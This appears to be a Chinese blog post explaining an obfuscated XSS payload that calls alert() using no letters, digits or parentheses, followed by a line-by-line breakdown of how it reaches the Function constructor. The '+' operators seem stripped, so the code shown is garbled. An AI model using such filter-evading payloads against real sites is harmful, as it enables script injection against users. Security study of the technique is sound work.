奇技淫巧(13) - XSS payload

2021-10-12 11:51:07 浏览数 (2)

alert() 不含字母、数字和括号的有效载荷

〱='',〳=〱,ᘓ=〱 {},ᘒ=〱 [][[]],〱 =[〱==〱],〳 =[!〱],ᘑ= [],ᘐ= ! [],ᘔ=ᘐ ᘐ,ᘕ=ᘔ ᘐ,ᘖ=ᘔ ᘕ,ᘖ =ᘖ ᘖ ᘔ,ᘗ=ᘖ ᘐ,ᘘ=ᘓ[ᘔ ᘕ],ᘙ=ᘓ[ᘐ],ᘚ=〱[ᘐ],ᘲ=〱[ᘑ],ᘳ=ᘘ ᘙ ᘒ[ᘐ] 〳[ᘕ] ᘲ ᘚ ᘒ[ᘑ] ᘘ ᘲ ᘙ 〱[ᘐ],ᘰ=[][ᘳ][ᘳ],ᘏ='' ᘰ,ᘎ=〳[ᘐ] 〳[ᘔ] 〱[ᘕ] ᘚ ᘲ ᘏ[ᘖ] ᘏ[ᘗ],ᘰ`ᘳ${ᘎ}```     

〳=〱              //''
ᘓ=〱 {}           //'[object Object]' <- ''   [object Object]
ᘒ=〱 [][[]]       //'undefined'       <- ''   undefined 
〱 =[〱==〱]       //'true'            <- Array from true
〳 =[!〱]         //'false'            <- Array from !true
ᘑ= []            //0                 
ᘐ= ! []          //1
ᘔ=ᘐ ᘐ           //2                  <- 1 1
ᘕ=ᘔ ᘐ            //3                 <- 2 1
ᘖ=ᘔ ᘕ            //5                 <- 2 2 1
ᘖ =ᘖ ᘖ ᘔ         //17                <- 5 5 5 2
ᘗ=ᘖ ᘐ           //18                <- 17 1

//letters that are used more than once defined seperately to shorten payload
ᘘ=ᘓ[ᘔ ᘕ]         //c                 <- '[object Object]'[5]
ᘙ=ᘓ[ᘐ]          //o                 <- '[object Object]'[1]
ᘚ=〱[ᘐ]          //r                 <- 'true'[1]
ᘲ=〱[ᘑ]          //t                 <- 'true'[0]

ᘳ=              //constructor
    ᘘ           //c                 <- '[object Object]'[5]
    ᘙ           //o                 <- '[object Object]'[1]
    ᘒ[ᘐ]        //n                 <- 'undefined'[1]
    〳[ᘕ]        //s                 <- 'false'[3]
    ᘲ           //t                 <- 'true'[0]
    ᘚ           //r                 <- 'true'[1]
    ᘒ[ᘑ]        //u                 <- 'undefined'[0]
    ᘘ           //c                 <-  '[object Object]'[5]
    ᘲ           //t                 <- 'true'[0]
    ᘙ           //o                 <- '[object Object]'[1]
    〱[ᘐ]       //r                 <- 'true'[1]

ᘰ = [][ᘳ][ᘳ]    //Function          <- []["constructor"]["constructor"] 
ᘏ='' ᘰ          //'function Function() { [native code] }'

ᘎ=              //alert
〳[ᘐ]           //a                 <- 'false'[1]
〳[ᘔ]            //l                 <- 'false'[2]
〱[ᘕ]            //e                 <- 'true[4]
ᘚ               //r                 <- 'true'[1]
ᘲ               //t                 <- 'true'[0]
ᘏ[ᘖ]            //(               <- 'function Function() { [native code] }'[17]
ᘏ[ᘗ]           //)                 <- 'function Function() { [native code] }'[18]

ᘰ`ᘳ${ᘎ}` ``     //alert()           <- []["constructor"]["constructor"]`ᘳ${"alert(234)"}` `` 

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